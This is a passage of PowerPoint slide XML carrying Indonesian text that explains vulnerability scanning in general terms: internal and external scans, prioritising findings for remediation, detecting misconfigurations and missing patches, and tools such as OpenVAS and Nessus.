            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelidiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> statis dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>openVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, basis data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat-alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
